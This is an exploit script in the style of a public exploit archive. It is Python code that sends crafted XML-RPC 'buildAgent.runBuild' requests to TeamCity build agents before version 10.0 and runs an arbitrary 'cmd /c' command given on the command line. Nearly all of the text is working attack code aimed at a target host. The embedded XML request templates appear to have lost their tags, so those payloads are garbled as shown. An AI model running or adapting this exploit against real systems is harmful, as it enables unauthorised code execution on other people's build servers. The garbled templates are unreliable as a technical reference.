# Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution # Date: 2020-03-20 # Exploit Author: Dylan Pindur # Vendor Homepage: https://www.jetbrains.com/teamcity/ # Version: TeamCity < 10.0 (42002) # Tested on: Windows 10 (x64) # References: # https://www.exploit-db.com/exploits/45917 # https://www.tenable.com/plugins/nessus/94675 # # TeamCity Agents configured to use bidirectional communication allow the execution # of commands sent to them via an XML-RPC endpoint. # # This script requires the following python modules are installed # pip install requests # #!/usr/local/bin/python3 import requests import sys # region tc7 teamcity_7_req = """ buildAgent.runBuild 123456 x ON_AGENT x

system.build.number 0

simpleRunner x

script.content {SCRIPT} teamcity.step.mode default use.custom.script true

teamcity.build.step.name x

3 ]]> """.strip() # endregion # region tc8 teamcity_8_req = """ buildAgent.runBuild 123456 x ON_AGENT x system.build.number 0 x false simpleRunner x teamcity.build.step.name x script.content {SCRIPT} teamcity.step.mode default use.custom.script true 3 ]]> """.strip() # endregion # region tc9 teamcity_9_req = """ buildAgent.runBuild 123456 x x ON_AGENT x 3 system.build.number 0 x false simpleRunner x teamcity.build.step.name x script.content {SCRIPT} teamcity.step.mode default use.custom.script true ]]> """.strip() # endregion # region tc10 teamcity_10_req = """ buildAgent.runBuild 123456 x x ON_AGENT x 123456 x 3 system.build.number 0 x false simpleRunner x teamcity.build.step.name x script.content {SCRIPT} teamcity.step.mode default use.custom.script true ]]> """.strip() # endregion def prepare_payload(version, cmd): if version == 7: return teamcity_7_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 8: return teamcity_8_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 9: return teamcity_9_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 10: return teamcity_10_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) else: raise Exception("No payload available for version {}".format(version)) def send_req(host, port, payload): headers = { "Content-Type": "text/xml" } url = "http://{}:{}/".format(host, port) r = requests.post(url, headers=headers, data=payload) if r.status_code == 200 and 'fault' not in r.text: print('Command sent successfully') else: print('Command failed') print(r.text) if len(sys.argv) != 4: print('[!] Missing arguments') print('[ ] Usage: {} '.format(sys.argv[0])) print("[ ] E.g. {} 192.168.1.128 9090 'whoami > C:\\x.txt'".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) cmd = sys.argv[3] version = input("Enter TeamCity version (7,8,9,10): ") version = int(version.strip()) if version not in [7, 8, 9, 10]: print("Please select a valid version (7,8,9,10)") sys.exit(1) payload = prepare_payload(version, cmd) send_req(target, str(port), payload)